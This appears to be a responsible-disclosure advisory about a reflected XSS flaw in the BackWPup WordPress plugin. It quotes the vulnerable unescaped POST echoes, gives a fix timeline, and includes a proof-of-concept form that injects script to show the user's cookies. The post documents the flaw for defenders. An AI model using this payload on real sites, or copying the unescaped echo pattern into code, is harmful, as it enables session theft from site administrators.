22 Mar

Reflected Cross-Site Scripting (XSS) Vulnerability in BackWPup

We recently discovered the BackWPup plugin had a reflected cross-site scripting (XSS) vulnerability. In version 3.2.5, and some prior versions, the file /inc/class-destination-sugarsync.php was echoing POST variables without escaping them. That occurred on line 32:

value="<?php if ( isset( $_POST[ 'sugaremail' ] ) ) echo $_POST[ 'sugaremail' ];?>" class="large-text" autocomplete="off" /></label>

and line 36:

value="<?php if ( isset( $_POST[ 'sugarpass' ] ) ) echo $_POST[ 'sugarpass' ];?>" class="large-text" autocomplete="off" /></label>

Proof Of Concept

The following proof of concept page will cause any available cookies to shown in alert box. Major web browsers other than Firefox provide XSS filtering so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=backwpupeditjob&tab=dest-sugarsync&jobid=2" method="post">
<input type="hidden" name="sugaremail" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="sugarpass" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="submit" />


  • 3/21/2016 – Developer notified.
  • 3/22/2016 – Version 3.3 released, which fixes vulnerability.

Leave a Reply

Your email address will not be published. Required fields are marked *